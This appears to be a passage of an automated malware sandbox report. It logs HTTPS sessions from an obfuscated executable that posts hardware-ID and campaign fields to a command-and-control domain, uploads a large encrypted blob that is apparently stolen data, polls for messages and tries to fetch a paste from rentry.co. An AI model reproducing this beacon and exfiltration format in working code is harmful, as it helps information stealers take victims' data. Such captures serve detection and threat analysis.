                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1889&min_rtt=1849&rtt_var=722&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21530&delivery_rate=1579232&cwnd=249&unsent_bytes=0&cid=df115222299ae692&ts=1167&x=0"
                                                                                                                                                2025-01-28 15:13:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2025-01-28 15:13:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                5192.168.2.949234172.67.202.1414437772C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-28 15:13:05 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=UDD2YJGU6IP3ESK79Y4
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 2656
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:13:05 UTC2656OUTData Raw: 2d 2d 55 44 44 32 59 4a 47 55 36 49 50 33 45 53 4b 37 39 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 55 44 44 32 59 4a 47 55 36 49 50 33 45 53 4b 37 39 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 44 44 32 59 4a 47 55 36 49 50 33 45 53 4b 37 39 59 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c
                                                                                                                                                Data Ascii: --UDD2YJGU6IP3ESK79Y4Content-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--UDD2YJGU6IP3ESK79Y4Content-Disposition: form-data; name="pid"1--UDD2YJGU6IP3ESK79Y4Content-Disposition: form-data; name="lid"MeHdy4--pl
                                                                                                                                                2025-01-28 15:13:21 UTC1134INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:13:21 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=v42fo50bfeolv3637be68rrdup; expires=Sat, 24 May 2025 08:59:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mTgrBFE7rz9f71dvqUmrjexzcz9zUVY%2BFMBOrMpQZLwOQTp5x%2FN%2BLfRs3AujARdKnXCFf30q%2BPaDrDiijpYFZutortUH0F52AjF3xPJ9JKY6TdpalZBcKMGML5GvhyejwHCKQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ecaa2a430f9d-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1560&rtt_var=608&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2843&recv_bytes=3575&delivery_rate=1764350&cwnd=193&unsent_bytes=0&cid=07ca3dce1afb5637&ts=15753&x=0"
                                                                                                                                                2025-01-28 15:13:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                2025-01-28 15:13:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                6192.168.2.949235172.67.202.1414437772C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-28 15:13:23 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: multipart/form-data; boundary=FCR2CY7USXN11D4G
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 574644
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 2d 2d 46 43 52 32 43 59 37 55 53 58 4e 31 31 44 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 46 43 52 32 43 59 37 55 53 58 4e 31 31 44 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 46 43 52 32 43 59 37 55 53 58 4e 31 31 44 34 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d
                                                                                                                                                Data Ascii: --FCR2CY7USXN11D4GContent-Disposition: form-data; name="hwid"D0F235DE537687D22F2109764D00B0F1--FCR2CY7USXN11D4GContent-Disposition: form-data; name="pid"1--FCR2CY7USXN11D4GContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 62 08 cb 83 3f 05 36 2a 8e 61 ab 6b 21 fa f4 7f a0 03 a6 01 ee 4d fa e2 ee 7a a3 98 70 2f 14 dd af 4d ce 1e 50 ef 1e 02 ec d6 79 df d9 93 28 4e 86 1f eb 6e 47 1f 02 c7 44 0d 66 23 fa a4 9b c2 d7 3e fc 6f 22 ec ff d0 af 27 16 58 6c 0b d0 bd 01 5d 12 f3 7b 59 4a fe 08 50 83 5a 15 e7 34 ac 09 2c 3c 67 4b 43 5b 81 ee bc 1c d5 ec 87 ef e7 36 1c e0 97 46 ec 2c 2c 3a 15 22 cf 2e 17 7b 7c 05 8c 72 33 a2 ea 75 e0 eb 5a c2 af 0d 47 f1 10 ae 8f d1 b4 b0 79 de b4 14 8d c2 b3 03 b8 a1 08 69 74 5b bc 31 83 a9 cf 78 70 9e 93 f6 91 18 da 24 9c d3 77 1d fd 5a c6 7a bc 52 1c cc b4 1a d7 f4 3e a6 3c fe 9b be 93 5d cc dd f0 ce 1b 0f eb 9f 8d 20 be a8 1d 67 d9 0b 1f f3 1e f9 05 61 50 02 97 c1 75 13 e2 cb 5a 3d 21 6b 77 d4 45 8d 64 a4 bb c8 37 04 b4 f0 b5 9d e6 e5 b8 82 32 b4
                                                                                                                                                Data Ascii: b?6*ak!Mzp/MPy(NnGDf#>o"'Xl]{YJPZ4,<gKC[6F,,:".{|r3uZGyit[1xp$wZzR><] gaPuZ=!kwEd72
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 07 4a 0f 9e c2 ea 53 ee 6b ce de 61 c3 f3 a1 2d 47 03 3f cf d3 02 3f 8c 84 55 55 cd 97 0d 0e d1 d8 0b 2c ef 09 74 b1 a1 80 43 af 3a c0 ac 56 b1 67 a4 16 86 56 da 02 0f 64 04 bd 38 79 24 f4 b3 59 4c 80 fc a9 9a 7f 51 95 b3 08 a0 98 c7 2d 8d 1f 04 70 bf df 0f f6 d3 31 4e 0b 63 84 df 3d 76 56 1e e4 4d b3 f9 41 a9 91 12 3d d7 1b 9d 77 34 67 6d e5 ff 65 1a 88 ae 8e 06 6f 90 1e ca 08 cc e9 6f 97 ca 03 59 53 d0 8f f0 c4 ff 57 98 2c 5e 63 5e 5d c0 65 fd 2e dd a3 0e 08 04 80 d1 28 2c 52 8c 5c 9c 9d c6 5c 86 22 74 19 2d 3f 7c 46 5e 6e 47 f2 ab 45 21 fd e1 f6 51 89 4c 95 f5 83 0f fd 53 4a 2b 3f 51 ff c5 17 a2 c8 4e e3 76 9f 5f 34 5e f0 dd be 34 49 04 99 8f a3 0b a1 14 0f 7f c4 31 fb 64 49 4d c1 1d 5c e1 98 ce aa ba d2 82 5f b7 91 5b 71 b2 8b 23 ea 75 e1 42 28 b2 78
                                                                                                                                                Data Ascii: JSka-G??UU,tC:VgVd8y$YLQ-p1Nc=vVMA=w4gmeooYSW,^c^]e.(,R\\"t-?|F^nGE!QLSJ+?QNv_4^4I1dIM\_[q#uB(x
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 9d 5b 01 19 e5 0f 60 4c e6 ce d5 e3 28 7f 45 e0 d8 33 43 0c ab c4 32 1e 14 c1 13 b2 12 f4 d0 bf a4 04 a0 90 f0 4b 80 a4 cb d2 5c 12 32 af 22 26 89 62 45 c0 07 51 4d 0b 90 56 1b 74 09 e0 19 39 23 c3 0a 62 23 15 db 5e d1 f5 85 34 9f 84 5d de 47 6c 06 c8 05 04 fb 81 1e 5c 1c ec 5d 68 73 4f 41 ac ee d9 ad b2 fe 60 36 a6 92 c4 cf bd 88 cf 69 5c cc f0 e1 7a 38 e8 a2 f1 1b 02 ca b5 0f b1 42 97 ff 28 e1 60 e7 d0 70 a9 68 65 d7 b5 9e c4 1b d2 40 45 4e 05 b4 4b 87 c9 28 9f 5d c0 ec 41 9e 28 0a c9 05 3c df 22 45 e5 32 99 8d 1d a0 40 0b ae 0e de b0 34 82 5b fa 1d 90 d4 c9 99 4a 5f c1 b4 98 95 91 7a 3d 1a d2 8f 32 b7 e3 25 11 6f d3 73 f1 96 d2 3e 8f f4 b4 66 98 00 4d 03 f1 50 06 33 6e 54 a6 3a be 9e ff 5d 09 37 87 1d a1 6c 73 ab d3 a5 78 34 a7 36 0b d9 d4 43 2e ab 1e
                                                                                                                                                Data Ascii: [`L(E3C2K\2"&bEQMVt9#b#^4]Gl\]hsOA`6i\z8B(`phe@ENK(]A(<"E2@4[J_z=2%os>fMP3nT:]7lsx46C.
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 7a d5 2d 70 92 1f 57 18 dc 7c 46 68 51 07 36 75 e4 be 17 b4 32 bc 80 80 36 eb c0 f8 c7 25 9e ae 56 3c 88 17 76 69 fe f3 7a 29 ce 92 e4 37 17 79 b1 02 27 68 86 8f 0d dc 50 30 b6 5b 2e 0b 33 e2 67 7b 98 ed bf f2 ba 32 a8 02 f3 f0 1d f2 b0 4b aa 3e 42 9c eb 2d 94 e3 7d 78 46 52 0b 96 3c 3d 1f 17 32 4b 27 64 9b 43 fa 12 58 80 a7 19 d2 42 40 35 64 3e 1d d0 f6 b2 59 85 af fe e8 ab 60 55 04 54 f0 49 c5 4b 89 92 af aa a3 85 db 8c 26 2e 7e ff a2 68 51 8e e0 e6 ab 20 1d b0 eb 45 5a c2 cd 92 91 95 03 58 48 d7 32 fe ef 8b a0 04 18 87 00 34 41 f7 3e 58 c3 00 89 42 60 e7 b7 e6 a7 72 8d 5d 18 49 48 82 d9 bf a9 2a a1 9e c6 fd fe 87 ad 23 04 20 47 df 71 b8 ee 88 2c 87 4d 54 d0 73 85 06 3a 9d 28 11 8e ef 8c 94 09 e3 e3 5f d9 20 74 3f b6 cf bb 9f fa 1d bb 7f b4 22 82 26 83
                                                                                                                                                Data Ascii: z-pW|FhQ6u26%V<viz)7y'hP0[.3g{2K>B-}xFR<=2K'dCXB@5d>Y`UTIK&.~hQ EZXH24A>XB`r]IH*# Gq,MTs:(_ t?"&
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: ea da 22 71 ed 9b c0 06 6b e7 3f 87 05 d2 37 d2 7b 99 21 bf ae 13 68 ea fb d1 77 b3 5e 3f de 1a d5 59 0d 9e 3d b9 c4 e1 6e 48 3a 44 d5 03 b5 a2 6b 6a 4f 64 ee 3f fb 24 e3 4f c7 ef e3 6e d4 ea f5 19 85 0c 23 68 5f de 1a 9b 5b 6a cc a2 c1 3d 22 7d 85 03 c4 50 38 e8 6b 18 aa 30 02 96 57 de 48 5a 6b f0 3d 6e 10 c0 0d 25 c9 81 5c 55 28 47 0e 58 ba 4e 49 51 9d 42 b2 0e 01 57 17 70 64 7e 0e 05 6c 97 35 1c 00 59 1a 35 df c7 4d fb 78 83 ac 83 2c f2 68 72 3a 05 72 69 ed 0f f6 7a 04 07 4c c1 39 34 5f c2 84 aa 8f b4 b1 3e 55 df 7f 56 ab 28 a5 72 3b 5f 2e d9 ad 3f 72 1b 96 e4 3c f6 39 1f 3b 9d e6 3b 37 b3 98 72 10 e5 2f 94 e8 31 03 92 81 22 f2 03 30 77 61 42 03 1f 04 1b db d6 bb 82 a8 28 aa 1a e9 83 9f 7a 66 d5 f9 74 ca 88 95 eb 0d f0 6e af 6e 2c 27 01 82 0a 9d b3 5c
                                                                                                                                                Data Ascii: "qk?7{!hw^?Y=nH:DkjOd?$On#h_[j="}P8k0WHZk=n%\U(GXNIQBWpd~l5Y5Mx,hr:rizL94_>UV(r;_.?r<9;;7r/1"0waB(zftnn,'\
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: eb 38 f5 20 60 ea 22 13 2e 93 16 1a 45 0d 98 cc 10 0e 8b 9a 44 d9 92 73 55 41 50 9b 30 fd 9a de 1c d8 3f 5d dc 49 16 9a a8 5b d4 ea 5a ce fb 48 33 9b a0 09 4a 84 41 93 74 8e 92 f7 b4 a8 3b b2 a0 85 51 db 69 6d 1b 11 64 36 4c cd d2 0a 07 d4 5e a8 c5 ad 15 58 6a 64 6a 83 20 cf 41 ca 4f 20 f9 6c 49 04 11 aa bd 0a 6b a8 04 a4 00 13 7d e5 45 1b 57 bc 95 d9 20 65 66 47 0e d5 2d af 4c 93 19 a0 40 d0 bf 11 49 4f 26 92 0a f4 fd 19 33 43 75 c9 b8 a2 6d 43 cd 8d 4b 5a 2b 21 bd 87 55 e4 75 fd d3 05 7a 0f 9e 77 9c 88 f2 75 74 c6 6f 7c 04 27 07 23 c4 96 7a 34 3f 54 a2 d4 10 dc b1 18 0c 91 2e 91 e4 8e 7a 23 60 fe 4d 13 8b b6 23 29 0f ee b8 b9 b0 67 d4 d2 c3 07 10 f1 ed e0 ce 2f 05 12 3a de 16 34 04 bf 9f f6 41 00 ce 25 ec 76 f7 7a 8c dc d5 ea e4 bd a7 87 3a 1e 87 64 72
                                                                                                                                                Data Ascii: 8 `".EDsUAP0?]I[ZH3JAt;Qimd6L^Xjdj AO lIk}EW efG-L@IO&3CumCKZ+!Uuzwuto|'#z4?T.z#`M#)g/:4A%vz:dr
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 3f 58 e1 93 64 45 cb ac 40 b6 30 19 0d eb 6f 26 c2 1a 7f f9 56 db 4b ff 7d 40 f4 e5 59 db a1 70 1c 40 32 1e 6e ce 4a 77 db 53 7b b6 c8 86 1d ec 1b e7 cf 16 04 6e bf 33 d7 34 3c b0 b2 2d bb 39 22 f1 fa 10 53 9c 90 00 78 3f 7b 1f a5 c2 27 78 11 e8 8e 41 c4 76 24 e9 51 ff c1 b1 1a 54 84 2c f7 3c c8 7e 40 91 e3 ee 06 6a c3 b7 ed e4 50 51 fd bf 3f 5f e4 59 31 92 9f 94 59 a8 e8 38 2a 2a 08 be 93 84 30 aa d8 06 1c 3c 72 d2 d9 b1 61 3b 8b e7 0a f2 8b 02 33 10 a6 17 67 b9 77 e7 4e 93 f1 d4 53 26 0b 48 e9 ee b2 1b c2 e0 7a 95 5d 5a 88 24 50 95 df d5 e8 26 6e 9f 9e 59 99 b8 ec 12 28 35 1b ca 40 a1 4e 7a f7 bd 3f cb 1f 1b 0d 57 a4 fb f3 f9 dc 8e 8b 8e 9a 2d 2b 22 27 1e 72 46 d3 a8 a8 b1 38 2d 5d 84 3a d8 a5 39 71 64 e3 60 3c c1 01 a3 94 de c5 f6 33 67 a6 a1 e1 d9 de
                                                                                                                                                Data Ascii: ?XdE@0o&VK}@Yp@2nJwS{n34<-9"Sx?{'xAv$QT,<~@jPQ?_Y1Y8**0<ra;3gwNS&Hz]Z$P&nY(5@Nz?W-+"'rF8-]:9qd`<3g
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: be 5c 01 0a 18 9d 7b 5e 32 12 e6 23 54 8b 63 61 51 12 e0 4c 54 cc 11 56 79 96 f8 62 c9 0a 28 3f 35 6d a9 99 d2 bb c5 a2 7c 89 8d 5f 9f 2d 29 e5 9a 95 59 f0 63 47 79 8b 7e d7 ef cc e0 78 95 b5 8b 7d 19 ed 1b e3 a7 15 68 6a c2 a3 b2 24 a2 4a 2d 0a e6 25 1f 12 4a 13 ff c0 11 41 8e 0e 2e f7 cc d3 5f c3 ae 1d 6d ca 29 a4 d4 24 27 98 d0 cd 6a 6a 71 a4 84 11 a8 5f 5d d2 b0 69 bb cb 67 cf 48 3b 1f d8 2b 47 fa df a4 70 df c5 dd 24 83 c3 c0 5b ad 2d 27 fc 47 93 a2 16 80 b7 01 83 df 0b a3 18 7b 46 50 37 a7 6d 77 8f 46 73 2b 43 7d 37 5a b3 ac 91 7b 63 eb f1 8d e8 f5 08 f3 cf c3 7e 0d 9f 47 02 8f e4 dd e9 88 77 74 2a 16 68 d8 1d b7 63 46 c7 3c 8d a4 2a c6 ac 47 c8 09 38 fd f3 b2 d3 b1 0c dd 27 65 d9 f3 69 ee 57 c5 f4 6a c6 bf 7c 70 bc 31 ef 97 8f 23 69 3d 60 e9 6a 26
                                                                                                                                                Data Ascii: \{^2#TcaQLTVyb(?5m|_-)YcGy~x}hj$J-%JA._m)$'jjq_]igH;+Gp$[-'G{FP7mwFs+C}7Z{c~Gwt*hcF<*G8'eiWj|p1#i=`j&
                                                                                                                                                2025-01-28 15:13:23 UTC15331OUTData Raw: 69 e5 f4 a4 3f d0 b0 94 0b eb e4 54 1e 77 64 f0 a9 89 b1 49 08 b7 81 bb 64 fb a3 88 c8 5e ce 69 37 da 18 49 75 d8 26 4c bd 60 67 fb db 6c 5f 85 43 a9 9b e8 69 cb 51 d9 05 f2 a0 c3 4a df c2 92 03 e7 76 e8 48 d0 25 40 e6 72 27 69 eb 9b ce 7d e5 41 da b9 37 e5 74 72 83 34 f2 c3 b4 cb be 68 df 18 9e 2f f5 fe 26 5a 7c 7b 65 0f 6b f6 00 2f 91 78 11 6f ce a5 73 e3 43 b6 df d1 6e ca bd b0 5f d0 ce 7b 31 35 1c 3c 61 10 2d d0 89 24 57 00 24 08 5d ab 74 e3 83 bb 24 10 af 96 dc 0e ab 30 60 5a 7e 2d a7 22 64 b5 c7 6e c8 5a a3 7a 42 f1 f6 c4 e9 a0 2f 12 76 15 5c 3b 0c 56 57 12 e8 ea f9 34 7d 97 fc ff f1 f4 e6 f1 50 be df e3 ff 75 cf 6e 1f 4b b6 30 23 29 45 8c 24 bb 19 b4 28 85 56 2a cb 48 a8 b4 58 93 75 ee b1 f7 6a a1 cd 52 d6 4a 14 a1 a4 2c 31 83 a2 10 42 96 b2 8c 64
                                                                                                                                                Data Ascii: i?TwdId^i7Iu&L`gl_CiQJvH%@r'i}A7tr4h/&Z|{ek/xosCn_{15<a-$W$]t$0`Z~-"dnZzB/v\;VW4}PunK0#)E$(V*HXujRJ,1Bd
                                                                                                                                                2025-01-28 15:13:35 UTC1138INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:13:35 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=v5ufc5slie25hg4sspghnsptl7; expires=Sat, 24 May 2025 09:00:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mzh1IpsAyxTO1EZyeAcP3vcf6aaoWFfMW7JhVQuP3J4wDOABxd3hbmoz%2FKt%2BnBiJ5fuBHDt9W5VaiwEbEn3FXMPp%2FqJRLwTj3dafeLlSiOw76tFDkoV7H7kDccqauwF94Ahezw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ed185b238c6c-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1885&min_rtt=1852&rtt_var=718&sent=198&recv=589&lost=0&retrans=0&sent_bytes=2842&recv_bytes=577190&delivery_rate=1576673&cwnd=168&unsent_bytes=0&cid=1eb3841e325ad79d&ts=12824&x=0"


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                7192.168.2.949236172.67.202.1414437772C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-28 15:13:36 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 84
                                                                                                                                                Host: traveladdicts.top
                                                                                                                                                2025-01-28 15:13:36 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 26 6a 3d 26 68 77 69 64 3d 44 30 46 32 33 35 44 45 35 33 37 36 38 37 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31
                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl2yan1&j=&hwid=D0F235DE537687D22F2109764D00B0F1
                                                                                                                                                2025-01-28 15:13:37 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                Date: Tue, 28 Jan 2025 15:13:37 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=1qfv0e8hf2qlec8cp2gqchf07l; expires=Sat, 24 May 2025 09:00:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vC7nHrlVr1qeVex0pvkEwNGXa1iDjrdZl9OlBjn21Kc78oma0EzipFMA8qq2Rz0fEv7m6mxVcw60DQbZn%2BSb2%2Fv%2F%2B7tNugBhiRpU0xOagXk8ZM62bAts4oNJ0sGi1TgC3T2evg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ed6b6de943cd-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1672&rtt_var=636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=985&delivery_rate=1707602&cwnd=252&unsent_bytes=0&cid=e89c8012747c45f1&ts=768&x=0"
                                                                                                                                                2025-01-28 15:13:37 UTC126INData Raw: 37 38 0d 0a 74 62 2b 58 49 4c 77 56 48 6c 41 4c 36 5a 75 56 34 42 72 58 57 6e 78 41 6e 6d 31 4d 6e 6e 54 67 70 6e 38 56 67 79 67 42 4d 33 76 75 78 4c 56 56 6e 69 38 38 4f 48 2b 64 36 2b 62 61 52 76 67 47 55 7a 4c 37 41 7a 6a 73 44 63 37 46 45 45 6d 73 54 6d 52 63 44 74 44 49 38 68 58 67 4f 6d 77 78 66 4d 75 33 74 34 5a 75 39 57 42 4f 62 4c 77 49 62 71 52 45 6e 66 73 3d 0d 0a
                                                                                                                                                Data Ascii: 78tb+XILwVHlAL6ZuV4BrXWnxAnm1MnnTgpn8VgygBM3vuxLVVni88OH+d6+baRvgGUzL7AzjsDc7FEEmsTmRcDtDI8hXgOmwxfMu3t4Zu9WBObLwIbqREnfs=
                                                                                                                                                2025-01-28 15:13:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                8192.168.2.949237104.26.3.164437772C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2025-01-28 15:13:37 UTC196OUTGET /feouewe5/raw HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Host: rentry.co
                                                                                                                                                2025-01-28 15:13:37 UTC904INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Tue, 28 Jan 2025 15:13:37 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                vary: Origin
                                                                                                                                                vary: accept-encoding
                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkXRJB%2Fs5vP1oGBpiFUPhRCJACrVgngHqPy%2Fy2l4j%2BiHMN%2BGcBdR8pXbOs%2BsxnutU6KoAPk7dNiEY8SR6vrwDz%2BGyr6LG8X1EsjXzz%2BQ6c%2B%2BbnH0q8IZF8IYDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 9091ed731f6d0cbc-EWR
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1669&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=810&delivery_rate=1731909&cwnd=184&unsent_bytes=0&cid=7e756fa19c397caa&ts=268&x=0"
